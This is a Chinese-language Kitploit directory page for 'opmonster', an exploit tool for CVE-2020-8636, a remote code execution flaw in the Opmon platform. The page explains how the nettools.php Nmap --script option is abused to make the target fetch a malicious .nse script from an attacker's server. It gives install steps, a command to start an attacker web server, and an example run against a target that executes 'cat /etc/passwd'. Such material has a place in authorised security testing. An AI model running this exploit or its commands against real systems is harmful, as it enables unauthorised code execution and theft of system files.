Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
opmonster — CVE-2020-8636 已认证的远程代码执行漏洞利用程序,针对 Opmon | Kitploit
工具/GitHubGitHub/phor3nsic/opmonster
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubphor3nsic/opmonster

opmonster

CVE-2020-8636 已认证的远程代码执行漏洞利用程序,针对 Opmon

查看仓库
21个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

OpMonster

CVE-2020-8636 — Opmon认证远程代码执行漏洞利用工具

简介 • 安装 • 使用 • 许可

language last commit license stars

OpMonster

简介

OpMonster 是针对 CVE-2020-8636 的概念验证漏洞利用工具,该漏洞是 Opmon 监控平台中的一个远程代码执行漏洞。它滥用 nettools.php 端点,该端点允许使用任意 --script 选项运行 Nmap。该利用工具使 Opmon 从您控制的服务器(通过 http-fetch)获取一个恶意的 .nse Nmap 脚本,将其放入 /tmp 目录,然后运行该脚本在目标设备上执行您的命令并打印输出结果。

由 @phor3nsic 发现并开发。 更多详情:Opmon 的三个 CVE 漏洞。

安装

root@kitploit:~
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests

使用

首先,在目标可访问的主机上启动一个 Web 服务器,并确保生成的 .nse 脚本可以被下载(漏洞利用工具会将脚本写入当前目录):

root@kitploit:~
php -S 0.0.0.0:1337

然后,使用四个位置参数运行漏洞利用工具:

root@kitploit:~
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"

如果目标无法下载脚本(“不受影响”),或无法向您的服务器发起出站连接,漏洞利用工具会中止并显示相应消息。

免责声明

仅供授权的安全测试和教育使用。您应对如何使用它负责。

许可

MIT © phor3nsic

下载工具
参数
描述
HOST目标 Opmon 基础 URL(例如 https://vulnhost.com)
LHOST您的主机地址,用于提供 .nse 脚本
LPORT您的主机端口
CMD在目标上执行的命令